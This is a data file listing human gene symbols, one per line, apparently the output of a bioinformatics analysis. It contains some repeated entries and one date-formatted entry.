LRRC36
IL34
MOK
DPPA2
B4GALT2
NUFIP1
ZNF169
TMCO2
C9orf85
TMEM200A
SNCAIP
COX10
C21orf58
KCNJ13
GPR25
KLHDC8A
BTG3
RPS6KL1
NUPR1
CAPZA3
OR2T11
TEX28
ANKDD1A
EME1
GJD2
F2RL3
DMP1
CCDC70
ZNF513
KIAA1841
RPS6KL1
C11orf16
GJA5
C7orf60
FAM160A1
PLEKHA8
KLHL30
TNFRSF1A
CPLX4
DMRTB1
AKNAD1
BBS10
PRTG
XAF1
CST8
TSHZ1
ABCG5
LRRC46
GFRA3
SCGB3A1
CD207
FNIP1
STAP1
TTLL9
TMEM100
GRP
TMEM200C
PDGFC
SLAMF7
ANKRD39
MFSD11
EYA1
C12orf76
AICDA
ZBTB5
CXCR1
CYP26A1
CEACAM4
TP53
FCAR
EMR3
USP2
PLCZ1
CCRL2
SSTR5
EMC9
AMICA1
CCDC38
AXDND1
SETDB2
PHLDA1
CHAD
C7orf45
WDR38
C1orf167
SLC30A10
PLK1S1
ZNF707
TDRD10
PTH2
CISH
F2R
TIFAB
MBOAT1
IL5
XYLT2
TNFRSF10A
FAM110D
PTCRA
PDP2
KCNK13
XAGE2
FRAT1
HCST
NTN5
CCDC83
RGS5
MAMLD1
DEFB113
TBX5
SMOX
LHFPL3
SRRM4
SGMS1
DOK4
PRSS54
KLHL12
C7orf53
NLRP3
UPK1B
CHRNB4
CD1C
G6PC
HLX
ARHGAP40
MYBL2
GPR123
ENTPD8
ADAT2
FAM90A1
MMP20
TMEM31
AMD1
CCDC126
RAD51AP1
PLCZ1
AKNAD1
EAF2
EVX2
TMEM202
C7orf29
HTR2C
DEPDC4
CCDC38
PRSS44
SPATA6
PADI6
COL10A1
SETDB2
ZNHIT3
GLB1L2
DPPA4
ZNF280A
PKMYT1
KLHL33
TIFA
ADAMTS13
EXO1
XKR3
C7orf57
RAD51AP1
MAML3
GCNT3
ZDHHC21
TNFRSF17
IFNK
FSD2
CLDN18
HSFX1
TMEM100
NR2E1
2014-03-09
GSDMC
ODF3L1
SNAI1
FST
SHISA9
PARP15
ZNF334
IGSF6
COLEC10
IQCF3
LCN15
ENTPD8
JHDM1D
HES6
ZKSCAN3
GRPEL2
SLITRK3
SEMA3E
DEGS2
FRMD7
TPCN2
KLHDC2
GCNT2
USP50
B3GALT4
SH3YL1
PTPRH
PLA2G4B
PLA2G4E
ZBTB34
IL21R
EXO1
IHH
C7orf57
PRDM8
MAML3
GCNT3
ZDHHC21
TNFRSF17
IFNK
FSD2
USP26
L3MBTL4
SPINK8
TSSK4
ULBP3
LNP1
CD80
